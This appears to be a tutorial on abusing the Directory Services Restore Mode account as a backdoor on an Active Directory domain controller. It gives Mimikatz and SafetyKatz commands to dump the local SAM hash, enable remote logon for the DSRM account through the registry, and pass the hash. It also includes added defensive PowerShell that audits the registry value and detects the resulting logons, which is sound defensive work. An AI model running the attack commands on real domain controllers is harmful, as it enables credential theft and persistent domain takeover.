DSRM is Directory Services Restore Mode, a boot mode of a Domain Controller used to repair or restore a corrupt Active Directory database.

When Windows Server is installed, a local Administrator account is created by default. When the machine is promoted to a Domain Controller, that local account is disabled for normal logon, since only domain accounts are expected to log on to a Domain Controller, unless this behaviour is abused as described below.

The DSRM password (SafeModePassword) must be set when a server is promoted to a Domain Controller, and it is rarely changed afterwards.


Once Domain Admin permissions are obtained, we can set a registry value on the Domain Controller that allows logon as its local Administrator (the DSRM account). The DSRM password is stored in the Domain Controller's local SAM database, not in NTDS.dit, so it is dumped from the SAM:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <computername>

Since this is the local Administrator of the DC, we can pass the hash to authenticate. However, the logon behaviour for the DSRM account must be changed first: a registry value has to be set to allow the DSRM account to authenticate to the DC outside restore mode:

Enter-PSSession -Computername <Domain Controller FQDN>
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Force
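From the defender's side, the registry value above is the artifact to audit. The following PowerShell is an added example, not part of the original page or any tool it mentions: it queries DsrmAdminLogonBehavior on every Domain Controller and reports any non-default setting, with a companion function that removes the value. The function names are mine; it assumes the ActiveDirectory RSAT module (for Get-ADDomainController) and WinRM access to the DCs. The meaning of the values (0 or absent: DSRM admin can log on only in restore mode; 1: can log on when the AD DS service is stopped; 2: can log on at any time) is Microsoft's documented behaviour.

```powershell
# Added audit helper (not from the original page). Reports the DsrmAdminLogonBehavior
# value on each Domain Controller and flags anything other than the default.
function Get-DsrmLogonBehaviorStatus {
    [CmdletBinding()]
    param(
        # Defaults to every DC in the current domain; requires the ActiveDirectory module
        [string[]]$ComputerName = (Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName)
    )

    $regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    $valueName = 'DsrmAdminLogonBehavior'

    foreach ($dc in $ComputerName) {
        try {
            # Read the value remotely; $null means the value does not exist (default behaviour)
            $value = Invoke-Command -ComputerName $dc -ErrorAction Stop -ScriptBlock {
                param($path, $name)
                $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
                if ($null -eq $item) { $null } else { [int]$item.$name }
            } -ArgumentList $regPath, $valueName
        } catch {
            [pscustomobject]@{
                DomainController       = $dc
                DsrmAdminLogonBehavior = $null
                Finding                = "Unreachable: $($_.Exception.Message)"
            }
            continue
        }

        if ($null -eq $value -or $value -eq 0) { $finding = 'Default: DSRM logon only in restore mode' }
        elseif ($value -eq 1)                  { $finding = 'Logon allowed while AD DS is stopped: review' }
        elseif ($value -eq 2)                  { $finding = 'Logon always allowed: investigate, likely persistence' }
        else                                   { $finding = "Unexpected value $value" }

        [pscustomobject]@{
            DomainController       = $dc
            DsrmAdminLogonBehavior = $value
            Finding                = $finding
        }
    }
}

# Added remediation helper (not from the original page). Deleting the value restores
# the default (DSRM admin can log on only in Directory Services Restore Mode).
function Reset-DsrmLogonBehavior {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$ComputerName)

    if ($PSCmdlet.ShouldProcess($ComputerName, 'Remove DsrmAdminLogonBehavior')) {
        Invoke-Command -ComputerName $ComputerName -ScriptBlock {
            Remove-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' `
                -Name 'DsrmAdminLogonBehavior' -ErrorAction SilentlyContinue
        }
    }
}

# Usage: list only DCs that deviate from the default, then reset them after review
Get-DsrmLogonBehaviorStatus |
    Where-Object { $_.DsrmAdminLogonBehavior -in @(1, 2) } |
    Format-Table -AutoSize
```

Because the value is a single DWORD that should never legitimately be 2 on a production DC, the audit is cheap enough to run on a schedule; a change on the key can also be captured in the Security log if a write SACL is configured on HKLM\System\CurrentControlSet\Control\Lsa.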

Now pass the hash:

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"'

Or using SafetyKatz.exe:

.\SafetyKatz.exe "sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"

or using BetterSafetyKatz:

.\BetterSafetyKatz.exe "sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"
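The pass-the-hash step above leaves a logon trace on the Domain Controller: the account logging on is the DC's local Administrator, so the Security event 4624 records the DC's own computer name as the account domain instead of the AD domain, which never happens for legitimate remote logons to a DC. The following PowerShell is an added detection example, not part of the original page or any tool it mentions; the function names are mine, the event objects at the bottom are constructed for the example, and ConvertFrom-LogonEvent assumes the standard Get-WinEvent event layout.

```powershell
# Added detection example (not from the original page). Flattens 4624 events from
# Get-WinEvent into plain objects, then flags remote logons where the account domain
# is the DC's own hostname, i.e. the DC's local (DSRM) Administrator was used.
function ConvertFrom-LogonEvent {
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)   # an EventLogRecord from Get-WinEvent
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Id               = $Event.Id
            TimeCreated      = $Event.TimeCreated
            TargetUserName   = $d.TargetUserName
            TargetDomainName = $d.TargetDomainName
            LogonType        = [int]$d.LogonType
            IpAddress        = $d.IpAddress
        }
    }
}

function Find-DsrmAccountLogon {
    param(
        [Parameter(Mandatory)][object[]]$Events,     # objects shaped like ConvertFrom-LogonEvent output
        [Parameter(Mandatory)][string]$DcHostName    # NetBIOS name of the DC, e.g. DC01
    )
    foreach ($e in $Events) {
        if ($e.Id -ne 4624) { continue }
        # Local DC account: the account domain is the DC's hostname, not the AD domain
        $isLocalDcAccount = $e.TargetDomainName -ieq $DcHostName
        # Network (3) or RemoteInteractive (10) logons are the ones a DSRM account should never perform
        $isRemoteLogon = $e.LogonType -in @(3, 10)
        if ($isLocalDcAccount -and $isRemoteLogon) {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Account   = "$($e.TargetDomainName)\$($e.TargetUserName)"
                LogonType = $e.LogonType
                Source    = $e.IpAddress
                Reason    = 'Remote logon with the DC local account: possible DSRM account abuse'
            }
        }
    }
}

# Constructed sample events (values invented for the example). In production, use:
#   Get-WinEvent -ComputerName DC01 -FilterHashtable @{LogName='Security'; Id=4624} | ConvertFrom-LogonEvent
$sample = @(
    [pscustomobject]@{ Id=4624; TimeCreated='2024-01-01 10:00'; TargetUserName='alice';         TargetDomainName='CORP'; LogonType=3; IpAddress='10.0.0.5'  }
    [pscustomobject]@{ Id=4624; TimeCreated='2024-01-01 10:02'; TargetUserName='Administrator'; TargetDomainName='DC01'; LogonType=3; IpAddress='10.0.0.99' }
    [pscustomobject]@{ Id=4624; TimeCreated='2024-01-01 10:03'; TargetUserName='DC01$';         TargetDomainName='CORP'; LogonType=3; IpAddress='-'         }
    [pscustomobject]@{ Id=4672; TimeCreated='2024-01-01 10:04'; TargetUserName='Administrator'; TargetDomainName='DC01'; LogonType=0; IpAddress='-'         }
)

# Only the second event is reported: DC01\Administrator over a network logon
Find-DsrmAccountLogon -Events $sample -DcHostName 'DC01' | Format-Table -AutoSize
```

The check relies only on the account-domain field, so it also catches the SafetyKatz and BetterSafetyKatz variants, which produce the same logon. Pair it with the registry audit: a non-default DsrmAdminLogonBehavior value explains why such a logon succeeded, and the two together are a strong persistence indicator.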